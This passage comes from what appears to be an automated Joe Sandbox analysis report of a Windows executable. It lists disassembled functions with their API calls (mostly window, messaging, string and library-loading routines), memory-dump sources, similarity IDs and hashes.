                                                                                                                • Instruction Fuzzy Hash: DE21B134600611EFCB51AB25C884B2EB3E5BF48B45F01412EED56AB752DF38EC09CB99
                                                                                                                Function 004B4AFB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InterlockedIncrement.KERNEL32(00526E2C), ref: 004B4B12
                                                                                                                • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4B27
                                                                                                                  • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                                                  • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                                                • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4B56
                                                                                                                • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4B9B
                                                                                                                • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4BC0
                                                                                                                  • Part of subcall function 004B6355: RtlLeaveCriticalSection.NTDLL ref: 004B6362
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked$Decrement$CriticalSection$EnterIncrementInitializeLeave
                                                                                                                • String ID: ,nR
                                                                                                                • API String ID: 2133288049-2953646183
                                                                                                                • Opcode ID: 06353121966184c96b89915dd8aff122bb503d95dbead61f9003243a5f485708
                                                                                                                • Instruction ID: 022256119f148c4c2e779ce32b5b478b08c6e2fbaaf7fc2c74051299f02b724c
                                                                                                                • Opcode Fuzzy Hash: 06353121966184c96b89915dd8aff122bb503d95dbead61f9003243a5f485708
                                                                                                                • Instruction Fuzzy Hash: 60212C31408204FADF117F559C81FDE7768AF91325F21012FF214161C3DA7CE942A639
                                                                                                                Function 004C82BF Relevance: 10.6, APIs: 7, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 004C82CC
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004C82E6
                                                                                                                • ScreenToClient.USER32(?,?), ref: 004C82F9
                                                                                                                • ScreenToClient.USER32(?,?), ref: 004C8302
                                                                                                                • EqualRect.USER32(?,?), ref: 004C830C
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 004C8334
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,00000000,00000000,?), ref: 004C834C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 443303494-0
                                                                                                                • Opcode ID: 18b85774aa58995e3236296be1b4092650a87eded5494399d91a840405cafc11
                                                                                                                • Instruction ID: ac089cc528e89377b988b5bdcd533a9f7ec59a469f36123118a614ed86cc77a1
                                                                                                                • Opcode Fuzzy Hash: 18b85774aa58995e3236296be1b4092650a87eded5494399d91a840405cafc11
                                                                                                                • Instruction Fuzzy Hash: 76114F75600249BFE7108F68DC88EBB7BBDEB98750F10852EB91597265EB31ED008B64
                                                                                                                Function 00480127 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: %.6x$dec$format$h$hex
                                                                                                                • API String ID: 3519838083-702273395
                                                                                                                • Opcode ID: 93acad5bdd7aaba1011b209201bc856cd8f6d7e101bb031f621f958fdc823553
                                                                                                                • Instruction ID: 117082e35f7c37181ea1e7285ce6b1896d589c41310ddc10f6cbb96157a5ac15
                                                                                                                • Opcode Fuzzy Hash: 93acad5bdd7aaba1011b209201bc856cd8f6d7e101bb031f621f958fdc823553
                                                                                                                • Instruction Fuzzy Hash: 9C21D171A00629ABCF12DFA9DC01AEFBBB5FF84714F00841AB815A7281C6B49A11D798
                                                                                                                Function 004104AA Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(Sfc.dll), ref: 004104BB
                                                                                                                • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 004104CF
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0041050A
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00410524
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressByteCharFreeLoadMultiProcWide
                                                                                                                • String ID: Sfc.dll$SfcIsFileProtected
                                                                                                                • API String ID: 344494338-411519151
                                                                                                                • Opcode ID: 5f7be1c675b036553d45c8a8721155a54f8b4541e35b3b93d54a37f2ab9d50e7
                                                                                                                • Instruction ID: d0eb5cbdaeaeaaf074f4c31dbdc265b80a1d5723da54da60d6c2dbc83f231219
                                                                                                                • Opcode Fuzzy Hash: 5f7be1c675b036553d45c8a8721155a54f8b4541e35b3b93d54a37f2ab9d50e7
                                                                                                                • Instruction Fuzzy Hash: C501A771600224BBDB209BA9DC88DDBBBACFF08750F1002A1F615D6291D6B45E80CB99
                                                                                                                Function 004A0760 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsBadStringPtrA.KERNEL32(00000000,00000000), ref: 004A076F
                                                                                                                • lstrlen.KERNEL32(00000000,?,00000000,?), ref: 004A0781
                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000), ref: 004A0794
                                                                                                                • WriteFile.KERNEL32(?,00511394,00000002,?,00000000), ref: 004A07A5
                                                                                                                • WriteFile.KERNEL32(?,???,00000005,?,00000000), ref: 004A07C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite$Stringlstrlen
                                                                                                                • String ID: ???
                                                                                                                • API String ID: 3955047007-928449859
                                                                                                                • Opcode ID: 95e4e759bab473608fee8448c50d5580fc38ffd756fbbfa8a2151f3970e3437f
                                                                                                                • Instruction ID: 6b3c03d80649553f8eaaa36fc563d4d80a87eb9919f7f150c6a747e768b693af
                                                                                                                • Opcode Fuzzy Hash: 95e4e759bab473608fee8448c50d5580fc38ffd756fbbfa8a2151f3970e3437f
                                                                                                                • Instruction Fuzzy Hash: D7F081762053117FE2009B54EC44FDB779CAF95B50F024419F600E6154D274A84A8BA5
                                                                                                                Function 004081CE Relevance: 10.5, APIs: 7, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004081DA
                                                                                                                • GetSysColor.USER32(00000012), ref: 004081E1
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004081EB
                                                                                                                • GetSysColor.USER32(00000012), ref: 004081F5
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004081FF
                                                                                                                • GetSysColor.USER32(00000012), ref: 00408209
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,0040734C), ref: 0040821F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1573920590-0
                                                                                                                • Opcode ID: 71138dffe68b57ab93e7dc671ffb905f698ed112d37f094e20794f56946cad89
                                                                                                                • Instruction ID: fb83359dd061ed59437400ccfdca853c3cd07ac22ae821cbf7658d3d1c2999dc
                                                                                                                • Opcode Fuzzy Hash: 71138dffe68b57ab93e7dc671ffb905f698ed112d37f094e20794f56946cad89
                                                                                                                • Instruction Fuzzy Hash: 9CF0DA70940744AEE7306F729C09F97BAE0FF90750F02883EE2959B1D1DAB5A450EF10
                                                                                                                Function 004409F9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(WININET.DLL,?,?,00440790), ref: 00440A01
                                                                                                                • LoadLibraryExA.KERNEL32(WININET.DLL,00000000,00000008,?,?,00440790), ref: 00440A11
                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetGetConnectedState), ref: 00440A23
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00440790), ref: 00440A35
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                                                • String ID: InternetGetConnectedState$WININET.DLL
                                                                                                                • API String ID: 2632591731-246962726
                                                                                                                • Opcode ID: 8311ff39c2b2f15472d27ae23cf25451aeb0f499f22be76e2ec79caeadc6f10f
                                                                                                                • Instruction ID: 63db8fa7f7d56c284249033813fc1498e6b85c6391afd78ab6149465f2fc2b9e
                                                                                                                • Opcode Fuzzy Hash: 8311ff39c2b2f15472d27ae23cf25451aeb0f499f22be76e2ec79caeadc6f10f
                                                                                                                • Instruction Fuzzy Hash: 25E09236B4167167A23217157C48F6F29589BF2BA1B020171FA00FA2518AB88C4285AC
                                                                                                                Function 004B81C6 Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStringTypeW.KERNEL32(00000001,004EF9B4,00000001,000000FF,00000100,00000001,000000FF,00000000,?), ref: 004B8205
                                                                                                                • GetStringTypeA.KERNEL32(00000000,00000001,004EF9B0,00000001,?), ref: 004B821F
                                                                                                                • GetStringTypeA.KERNEL32(000000FF,000000FF,00000000,00000000,?,00000100,00000001,000000FF,00000000,?), ref: 004B8253
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000100,00000001,000000FF,00000000,?), ref: 004B828B
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000000,?,?), ref: 004B82E1
                                                                                                                • GetStringTypeW.KERNEL32(000000FF,?,00000000,?,?,?), ref: 004B82F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringType$ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 3852931651-0
                                                                                                                • Opcode ID: 356071c50b2b1e727d03eb6797e95eeda4ac279e5146e2e17f3bc99a5f72e064
                                                                                                                • Instruction ID: 4a2456eaae4b3f64fb29d6f6e4fb11d8c1f6ba0c1b9e07f7983ef96d3f1495f3
                                                                                                                • Opcode Fuzzy Hash: 356071c50b2b1e727d03eb6797e95eeda4ac279e5146e2e17f3bc99a5f72e064
                                                                                                                • Instruction Fuzzy Hash: E241BE72A00689AFCF218F94CC85AEF7FB8FB19350F10042AFA05D6251C7399911DBA8
                                                                                                                Function 00458974 Relevance: 9.1, APIs: 6, Instructions: 117windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 0045899C
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00458A28
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00458A35
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00458A94
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00458AA4
                                                                                                                • PostMessageA.USER32(?,?,?,?), ref: 00458AC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientScreen$MessageParentPost
                                                                                                                • String ID:
                                                                                                                • API String ID: 1061243768-0
                                                                                                                • Opcode ID: 7742fe7b90e36df2e58740fd97240d5c239cdeb7708534c5c6421a76e8851dc2
                                                                                                                • Instruction ID: e332ca7936f72a492913b1633bd3eec4ef988b810c068fc493664a591cb16b43
                                                                                                                • Opcode Fuzzy Hash: 7742fe7b90e36df2e58740fd97240d5c239cdeb7708534c5c6421a76e8851dc2
                                                                                                                • Instruction Fuzzy Hash: 80419171500205EBDF244F58D88497E7BB4EB04302F20882FE952E2252DE78ED99D759
                                                                                                                Function 00420796 Relevance: 9.1, APIs: 6, Instructions: 106windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0042079B
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 004207C4
                                                                                                                • __ftol.LIBCMT ref: 004207D6
                                                                                                                • IsWindow.USER32(?), ref: 0042081C
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420839
                                                                                                                • SendMessageA.USER32(?,00000150,-00000001,00000000), ref: 00420851
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologMessageSend__ftol$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2561276666-0
                                                                                                                • Opcode ID: bca619425f78a7528706cc2b2316d53dd3d035dc6906635b98e49142f7b76452
                                                                                                                • Instruction ID: f5c197937d0df46bc2b22f53e801e15f997021915a2b149e9a8b81887e70d1d0
                                                                                                                • Opcode Fuzzy Hash: bca619425f78a7528706cc2b2316d53dd3d035dc6906635b98e49142f7b76452
                                                                                                                • Instruction Fuzzy Hash: 2931E771A00614AEDB10FBA6DC81FEF7BB4EF40304F50442FF552A7292DB7999418759
                                                                                                                Function 004540F7 Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00454132
                                                                                                                • SendMessageA.USER32(00000000,00000187,00424688,00000000), ref: 00454148
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 0045416A
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00454192
                                                                                                                • SendMessageA.USER32(00000000,00000187,00424688,00000000), ref: 004541A8
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004541CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 2326795674-0
                                                                                                                • Opcode ID: 7823ba83b9b4b2bde09d4142e0da30b20efe51622fa7d7590f7ca6511cb7c970
                                                                                                                • Instruction ID: 3accbac8d4c820b9a490b258e36431a25253bebf7418b9a2f07460033ef3efce
                                                                                                                • Opcode Fuzzy Hash: 7823ba83b9b4b2bde09d4142e0da30b20efe51622fa7d7590f7ca6511cb7c970
                                                                                                                • Instruction Fuzzy Hash: A7314D31104B45EBC215CF65CC84C27BBE9FF95389B01492EB9918B262CB35EC86CB29
                                                                                                                Function 004586C0 Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 004586E8
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00458751
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0045875E
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0045878D
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0045879A
                                                                                                                • PostMessageA.USER32(?,?,?,?), ref: 004587B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientScreen$MessageParentPost
                                                                                                                • String ID:
                                                                                                                • API String ID: 1061243768-0
                                                                                                                • Opcode ID: 10b95b089efa1b1f29aca84f8d33e2f1643541ffbc64581302a4a41bdf219db8
                                                                                                                • Instruction ID: c84670a856872c5c6493c3174f33add3df626ce2ec2b4fed9489b4fc00db4d0a
                                                                                                                • Opcode Fuzzy Hash: 10b95b089efa1b1f29aca84f8d33e2f1643541ffbc64581302a4a41bdf219db8
                                                                                                                • Instruction Fuzzy Hash: EF319E31500204ABEB204F58DC8897B77B4EB08342F20842FEC52F2666DF38DD95DB59
                                                                                                                Function 004208D0 Relevance: 9.1, APIs: 6, Instructions: 95windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004208D5
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 004208FE
                                                                                                                • __ftol.LIBCMT ref: 0042090D
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                • IsWindow.USER32(?), ref: 00420956
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420973
                                                                                                                • SendMessageA.USER32(?,00000151,00000000,?), ref: 004209A4
                                                                                                                Memory Dump Source
